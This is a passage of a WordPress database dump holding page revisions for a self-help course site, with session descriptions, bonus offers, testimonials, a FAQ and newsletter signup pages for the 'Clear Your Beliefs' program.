href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 15:26:39', '2014-12-12 20:26:39', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2031, 2, '2014-12-12 17:17:31', '2014-12-12 22:17:31', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-12 17:17:31', '2014-12-12 22:17:31', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(2030, 2, '2014-12-12 17:16:46', '2014-12-12 22:16:46', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n\r\n\r\n<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<p><center><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" /></center></p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-12 17:16:46', '2014-12-12 22:16:46', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(2032, 2, '2014-12-12 17:19:02', '2014-12-12 22:19:02', ' ', '', 'Program', 'publish', 'closed', 'open', '', '2032', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://clearyourbeliefs.com/?p=2032', 5, 'nav_menu_item', '', 0),
(2034, 2, '2014-12-12 17:21:23', '2014-12-12 22:21:23', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-12 17:21:23', '2014-12-12 22:21:23', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(2035, 2, '2014-12-12 17:22:36', '2014-12-12 22:22:36', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form; margin-left: 30px; margin-right: 30px;"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you 